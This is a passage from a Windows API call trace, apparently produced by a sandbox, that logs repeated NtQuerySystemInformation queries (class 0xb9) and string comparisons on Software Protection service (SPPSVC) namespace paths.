SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.575] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0239.583] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0239.593] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0239.601] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", 